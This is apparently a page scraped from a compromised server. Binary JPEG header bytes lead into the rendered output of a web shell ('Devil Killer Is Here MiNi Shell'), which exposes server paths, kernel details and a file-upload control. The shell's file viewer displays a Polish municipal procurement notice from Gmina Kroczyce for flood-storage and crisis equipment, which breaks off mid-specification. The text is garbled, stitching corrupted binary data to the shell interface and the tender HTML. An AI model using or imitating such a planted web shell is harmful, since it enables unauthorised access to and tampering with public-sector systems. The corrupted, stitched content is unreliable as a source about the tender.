JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250923/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250923/0043673501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Doposażenie magazynu przeciwpowodziowego i magazynu zarządzania kryzysowego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA KROCZYCE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 151398729</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">BATALIONÓW CHŁOPSKICH 29</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kroczyce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-425</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22B - Sosnowiecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">343152151 do 5</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@kroczyce.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kroczyce.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Doposażenie magazynu przeciwpowodziowego i magazynu zarządzania kryzysowego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e2f893fc-ad55-40b6-9685-7261c5a6baa4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00436735</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00006842/11/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.5 Doposażenie magazynu przeciwpowodziowego i magazynu zarządzania kryzysowego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://gwkroczyce.e-zp.finn.pl/procurements/108/procurement <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Przedmiotowe postępowanie prowadzone jest przy użyciu środków komunikacji<br/>elektronicznej. Komunikacja następuje za pośrednictwem Systemu E- zamówienia Publiczne Gminy Kroczyce dostępnym pod<br/>adresem internetowym: https://gwkroczyce.e-zp.finn.pl/procurements/108/procurement</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne związane z<br/>korzystaniem z Systemu (tj. informacje dotyczące specyfikacji połączenia, formatu przesyłanych danych oraz kodowania i<br/>oznaczania czasu przekazania danych):<br/>• stały dostęp do sieci Internet i minimalna prędkość połączenia internetowego nie mniejsza niż 512 kb/s;<br/>• zaktualizowana przeglądarka internetowa Chrome w wersji 77 i późniejsze lub Mozilla Firefox w wersji 63 i późniejsze;<br/>• system operacyjny Microsoft Windows 7 i późniejsze lub Apple macOS 10.14 i późniejsze, dystrybucje systemu Linux. Oferty oraz<br/>oświadczenia, o których mowa w art. 125 ust. 1 ustawy PZP, należy sporządzić i złożyć pod rygorem nieważności w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>Specyfikacja połączenia, formatu przesyłanych danych oraz kodowania i oznaczania czasu odbioru danych Systemu E-ZP:<br/>- Format kodowania treści w obrębie Systemu - UTF8,<br/>- Komunikacja pomiędzy przeglądarką Wykonawcy, a serwerem jest wykonywana przy użyciu bezpiecznego protokołu HTTPS,<br/>- Oznaczeniem czasu odbioru danych przez System jest data oraz dokładny czas (hh:mm:ss),<br/>- czas lokalny serwera synchronizowany odpowiednim źródłem czasu.<br/>Szerzej na ten temat w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający informuje, że:<br/>a) administratorem Pani/Pana danych osobowych jest Wójt Gminy Kroczyce z siedzibą przy ul. Batalionów Chłopskich 29, 42-425<br/>Kroczyce;<br/>b) administrator wyznaczył Inspektora Ochrony Danych Osobowych, z którym można się kontaktować pod numerem telefonu 34<br/>315-21-51 ÷ 5 wew. 39 i adresem e-mail: iod@kroczyce.pl<br/>c) Dane osobowe Wykonawcy będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO czyli przetwarzanie jest niezbędne do<br/>wypełnienia obowiązku prawnego ciążącego na administratorze w celu przeprowadzenia przedmiotowego postępowania o<br/>udzielenie zamówienia publicznego.<br/>d) Odbiorcami przekazanych przez wykonawcę danych osobowych będą osoby lub podmioty, którym zostanie udostępniona<br/>dokumentacja postępowania zgodnie z art. 18 oraz art. 74 ustawy Pzp, a także art. 6 ustawy z 6 września 2001 r. o dostępie do<br/>informacji publicznej (t.j. Dz. U. z 2022r. poz. 902).<br/>e) Dane osobowe wykonawcy zawarte w protokole postępowania będą przechowywane przez okres 4 lat, od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 18 stycznia 2011 r. w sprawie instrukcji kancelaryjnej,<br/>jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych (tj. Dz.U z 2011<br/>nr 14, poz. 67 z późn. zm.) teczki aktowe będą przechowywane w archiwum zakładowym przez okres 5 lat w przypadku<br/>dokumentacji zamówień publicznych oraz 10 lat w przypadku umów zawartych w wyniku postępowania w trybie zamówień<br/>publicznych.<br/>f) Zamawiający nie planuje przetwarzania danych osobowych wykonawcy w celu innym niż cel określony w lit. c powyżej. Jeżeli<br/>administrator będzie planował przetwarzać dane osobowe w celu innym niż cel, w którym dane osobowe zostały zebrane (tj. cel<br/>określony w lit. c powyżej), przed takim dalszym przetwarzaniem poinformuje on osobę, której dane dotyczą, o tym innym celu oraz<br/>udzieli jej wszelkich innych stosownych informacji, o których mowa w art. 13 ust. 2 RODO.<br/>g) Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym postępowaniu, do wypełnienia wszystkich obowiązków<br/>formalno-prawnych wymaganych przez RODO i związanych z udziałem w przedmiotowym postępowaniu o udzielenie zamówienia.<br/>Do obowiązków tych należą:<br/>- obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i od których<br/>dane te wykonawca bezpośrednio pozyskał i przekazał zamawiającemu w treści oferty lub dokumentów składanych na żądanie<br/>zamawiającego;<br/>- obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane wykonawca pozyskał w sposób<br/>pośredni, a które to dane wykonawca przekazuje zamawiającemu w treści oferty lub dokumentów składanych na żądanie<br/>zamawiającego.<br/>W odniesieniu do danych osobowych wykonawcy decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający informuje, że Wykonawca posiada prawo:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych, które go dotyczą – w przypadku, gdy wykonanie obowiązków, o<br/>których mowa w art. 15 ust. 1-3 RODO wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której<br/>dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub<br/>daty postępowania o udzielenie zamówienia publicznego;<br/>- w przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO wymagałoby niewspółmiernie dużego wysiłku,<br/>Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających w szczególności na celu<br/>sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia publicznego.<br/>- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (przy czym korzystanie z prawa do<br/>sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień<br/>umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników)<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO (przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w<br/>odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby<br/>fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego).<br/>Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO , nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończenia postępowania o udzielenie zamówienia publicznego;<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, jeśli uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Zamawiający informuje, że Wykonawcy nie przysługuje:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>-na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">UG-V.271.00015.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ I ZAMÓWIENIA – DOSTAWA AGREGATÓW PRĄDOTWÓRCZYCH<br/><br/>Przedmiotem zamówienia jest dostawa agregatów prądotwórczych wg następującej specyfikacji:<br/><br/>1) Agregat prądotwórczy stacjonarny trójfazowy – 1 szt.<br/><br/>Minimalne wymagania: <br/>- Moc znamionowa:100 kW, <br/>- Napięcie znamionowe i częstotliwość: 230/400 V, 50 Hz, 3-fazowa sieć.,<br/>- Możliwość podłączenia odbiorników zarówno trójfazowych (400 V), jak i jednofazowych (230 V),<br/>- Silnik wysokoprężny (diesel), chłodzony cieczą,<br/>- Zbiornik paliwa zapewniający min. 8 godzin pracy przy obciążeniu znamionowym (lub równoważny czas pracy),<br/>- Automatyczny system rozruchu i zatrzymania,<br/>- Zabezpieczenia przeciążeniowe i przeciwzwarciowe,<br/>- Obudowa dźwiękochłonna, poziom hałasu nie większy niż 78 dB(A) w odległości 7 m,<br/>- Licznik motogodzin,<br/>- Wąż do odprowadzania spalin o długości minimum 2,5m.<br/><br/>2) Agregaty prądotwórcze przenośne inwerterowe o mocy 1 kW – 5 szt.<br/><br/>Minimalne wymagania: <br/>- moc znamionowa 1 kw<br/>- napięcie wyjściowe 230 V, 50 Hz,<br/>- zasilany mieszanką benzyny bezołowiowej lub benzyną <br/>- silnik jednofazowy, dwucylindrowy<br/>- stabilizacja napięcia (inwerter),<br/>- rozruch ręczny<br/>- poziom hałasu ≤ 65 dB(A) w odległości 7 m,<br/>- waga nie większa niż 15 kg,<br/>- czas pracy na zbiorniku paliwa min. 3 godziny,<br/>- Wąż do odprowadzania spalin o długości minimum 2,5m. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31122000-7 - Jednostki prądotwórcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">31121000-0 - Zestawy prądnicowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">40 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach:<br/>1) Cena oferty brutto;<br/>2) Termin dostawy,<br/>3) Okres gwarancji udzielonej przez wykonawcę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji udzielonej przez wykonawcę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ II ZAMÓWIENIA –WYPOSAŻENIE TERENOWE<br/><br/>Przedmiotem zamówienia jest dostawa wyposażenia terenowego wg następującej specyfikacji:<br/><br/>1) Ławki i stoły składane (wyposażenie do namiotu) – 30 zestawów<br/><br/>Minimalne wymagania: <br/>1 zestaw składa się ze stołu oraz dwóch ławek, wykonanych w konstrukcji składanej, umożliwiającej szybki montaż i demontaż.<br/>- Stoły: długość min. 180 cm, szerokość min. 46 cm, wysokość ok. 75 cm.<br/>- Ławki: długość min. 180 cm, szerokość siedziska min. 23 cm, wysokość ok. 45 cm.<br/>- Konstrukcja stalowa malowana proszkowo.<br/>- Blat i siedziska z drewna lakierowanego, tworzywa odpornego na warunki atmosferyczne lub równo-ważnego materiału o podobnej trwałości.<br/>- Konstrukcja powinna umożliwiać stabilne ustawienie w warunkach terenowych.<br/><br/>2) Worki na piach – 6000 szt.<br/><br/>Minimalne wymagania: <br/>- Materiał: polipropylen (PP) lub równoważny materiał syntetyczny, zapewniający odpowiednią wytrzymałość i trwałość.<br/>- Wymiary: 50 × 80 cm.<br/>- Ładowność: min. 30 kg.<br/><br/>3) Łopaty – 100 szt.<br/><br/>Minimalne wymagania: <br/>- Długość całkowita: ok. 130–135 cm.<br/>- Szerokość ostrza: ok. 22–26 cm.<br/>- Trzonek: metalowy lub drewniany, o odpowiedniej wytrzymałości.<br/>- Głowica: stalowa lub wykonana z równoważnego materiału odpornego na uderzenia.<br/>- Uchwyt: profilowany, antypoślizgowy lub równoważny, zapewniający ergonomię i bezpieczne użytkowanie.<br/>- Przeznaczenie: do pracy z piaskiem, drobnym gruzem oraz w warunkach wilgotnych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">43327000-1 - Sprzęt z gotowych elementów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">18930000-7 - Worki i torby</p> <p class="mb-0">44511110-9 - Szpadle</p> <p class="mb-0">39113600-3 - Ławki</p> <p class="mb-0">39151200-7 - Stoły robocze</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">40 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach:<br/>1) Cena oferty brutto;<br/>2) Termin dostawy,<br/>3) Okres gwarancji udzielonej przez wykonawcę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji udzielonej przez wykonawcę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ III ZAMÓWIENIA – ŚRODKI OCHRONY INDYWIDUALNEJ (BHP)<br/><br/>Przedmiotem zamówienia jest dostawa środków ochrony indywidualnej wg następującej specyfikacji:<br/><br/>1) Kombinezony ochronne kat. III – 100 szt.<br/><br/>Minimalne wymagania: <br/>- Kombinezon ochronny przeznaczony do pracy w środowiskach narażonych na działanie substancji chemicznych, pyłów oraz zagrożeń biologicznych.<br/>- Zgodność z normą EN 14126 (lub równoważną).<br/>- Klasy ochrony: Typ 3, Typ 4, Typ 5, Typ 6.<br/>- Materiał barierowy, wielowarstwowy, o podwyższonej odporności chemicznej, grubość zapewniająca skuteczną ochronę (min. 100 µm lub równoważny poziom zabezpieczenia).<br/>- Szwy: klejone lub zgrzewane, szczelne.<br/>- System wentylacji grzbietowej zapewniający komfort użytkowania (np. AP lub równoważny).<br/>- Kolor: jaskrawy (np. żółty, pomarańczowy, zielony fluorescencyjny), zapewniający dobrą widoczność.<br/>- Rozmiary: od L do XL (dokładne ilości do ustalenia z Zamawiającym).<br/><br/>2) Rękawice gumowe chemoodporne – 100 szt. (100 par)<br/><br/>Minimalne wymagania: <br/>- Zgodność z normą EN 374 (lub równoważną) (rękawice ochronne zostały przetestowane pod 